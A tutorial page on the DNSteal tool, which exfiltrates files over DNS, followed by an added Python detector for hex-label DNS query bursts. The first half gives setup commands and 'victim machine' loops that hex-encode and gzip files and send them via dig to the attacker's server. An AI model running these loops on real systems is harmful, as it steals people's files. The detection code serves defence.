data exfiltration – DNSteal


Dnsteal is a data exfiltration tool that sends files over DNS requests. Once set up and running, it acts as a fake DNS server that lets you stealthily extract files from a victim machine through the DNS queries that machine sends to it.

Install & start server
git clone https://github.com/dutchcoin/dnsteal.git /opt/dnsteal
cd /opt/dnsteal && python dnsteal.py
Transfer file from the victim
On the victim machine, you can simply run something like this (xxd -p emits the file as hex, 60 characters per line, so each query carries 30 bytes of the file in its leftmost label):
for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done

On the server side you will see the file transfer start.
When the transfer is finished, stop the server with CTRL-C to save the file and display its md5sum.
You can verify the md5sum on the victim's machine by running:
md5sum filename


Support for multiple files
Dnsteal supports exfiltrating multiple files. Use it as below:
for filename in $(ls); do for b in $(xxd -p $filename); do dig +short @server $b.$filename.com; done; done
gzip compression supported

It also supports gzip compression of the file, which allows for faster transfers; enable it on the server with the "-z" switch:
python dnsteal.py -z

Then, on the victim machine, send a gzipped file like so:
for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done

For multiple gzip-compressed files, use:
for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server $b.$filename.com; done; done
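The transfers above, plain and gzipped alike, share one visible trait on the resolver or in DNS logs: a burst of queries from one host whose leftmost label is a long, hex-only string (the xxd -p line) under one parent domain. The following is an added detection example written for this page, not part of dnsteal or its documentation. It assumes a dnsmasq-style query log format and uses constructed log lines; the thresholds (minimum label length 32, three hex-label queries per source/domain pair) are assumptions to tune against your own traffic. Because the check looks only at the label charset and length, it works the same whether or not the sender compressed the file first, and the "implied_bytes" figure it reports is the size of the encoded data (the compressed size for gzipped transfers).

```python
import re
from collections import defaultdict

# Constructed sample log lines in a dnsmasq-style query format (not real traffic).
# The first three queries carry 60-character hex labels, the shape "xxd -p"
# produces (30 bytes per line) when each line is sent as a subdomain.
SAMPLE_LOG = """\
Jun 12 10:01:01 dnsmasq[1234]: query[A] 89504e470d0a1a0a0000000d494844520000002000000020080600000000.filename.com from 10.0.0.5
Jun 12 10:01:01 dnsmasq[1234]: query[A] 737a7a19b47e000000026249444154789cedc10101000000c220fbb76d8e.filename.com from 10.0.0.5
Jun 12 10:01:02 dnsmasq[1234]: query[A] 00000000c0a000010000000049454e44ae42608200000000000000000000.filename.com from 10.0.0.5
Jun 12 10:01:02 dnsmasq[1234]: query[A] www.example.org from 10.0.0.7
Jun 12 10:01:03 dnsmasq[1234]: query[AAAA] mail.example.org from 10.0.0.7
Jun 12 10:01:03 dnsmasq[1234]: query[A] 1a2b3c.cdn.example.net from 10.0.0.8
"""

QUERY_RE = re.compile(r"query\[(?P<qtype>[A-Z]+)\] (?P<qname>\S+) from (?P<src>\S+)")
HEX_RE = re.compile(r"^[0-9a-f]+$", re.IGNORECASE)


def parse_queries(log_text):
    """Return (src, qname) tuples for every query line; other lines are ignored."""
    out = []
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            out.append((m.group("src"), m.group("qname").rstrip(".").lower()))
    return out


def is_hex_label(label, min_len=32):
    """True if the label looks like a hex dump chunk: long and hex-only.
    Short hex-looking labels such as "1a2b3c" or "deadbeef" are common in
    legitimate CDN hostnames, hence the length floor (an assumed threshold)."""
    return len(label) >= min_len and bool(HEX_RE.match(label))


def parent_domain(qname):
    """Registrable-domain approximation: the last two labels. A public suffix
    list would be needed to handle names such as example.co.uk correctly."""
    return ".".join(qname.split(".")[-2:])


def summarize(queries, min_len=32):
    """Aggregate hex-label queries per (source, parent domain).

    Returns {(src, parent): {"hex_queries": n, "implied_bytes": b, "unique_labels": u}}.
    implied_bytes is len(label) // 2 summed over the hex labels: the number of
    bytes those labels decode to (the compressed size if the sender gzipped).
    """
    stats = defaultdict(lambda: {"hex_queries": 0, "implied_bytes": 0, "labels": set()})
    for src, qname in queries:
        first = qname.split(".")[0]
        if is_hex_label(first, min_len):
            s = stats[(src, parent_domain(qname))]
            s["hex_queries"] += 1
            s["implied_bytes"] += len(first) // 2
            s["labels"].add(first)
    return {
        k: {"hex_queries": v["hex_queries"], "implied_bytes": v["implied_bytes"],
            "unique_labels": len(v["labels"])}
        for k, v in stats.items()
    }


def flag_exfiltration(log_text, min_hex_queries=3, min_len=32):
    """Return sorted (src, parent) pairs whose hex-label query count reaches the threshold."""
    summary = summarize(parse_queries(log_text), min_len)
    return sorted(k for k, v in summary.items() if v["hex_queries"] >= min_hex_queries)


if __name__ == "__main__":
    summary = summarize(parse_queries(SAMPLE_LOG))
    for src, parent in flag_exfiltration(SAMPLE_LOG):
        s = summary[(src, parent)]
        print(f"{src} -> {parent}: {s['hex_queries']} hex-label queries, "
              f"~{s['implied_bytes']} bytes encoded, {s['unique_labels']} unique labels")
```

On the sample lines only the 10.0.0.5 -> filename.com pair is reported (three queries, about 90 bytes encoded); the short "1a2b3c" label under example.net stays below the length floor. In production the same aggregation would run over a time window, and the unique-label count matters: a real file produces almost no repeated chunks, whereas legitimate hosts re-query the same few names.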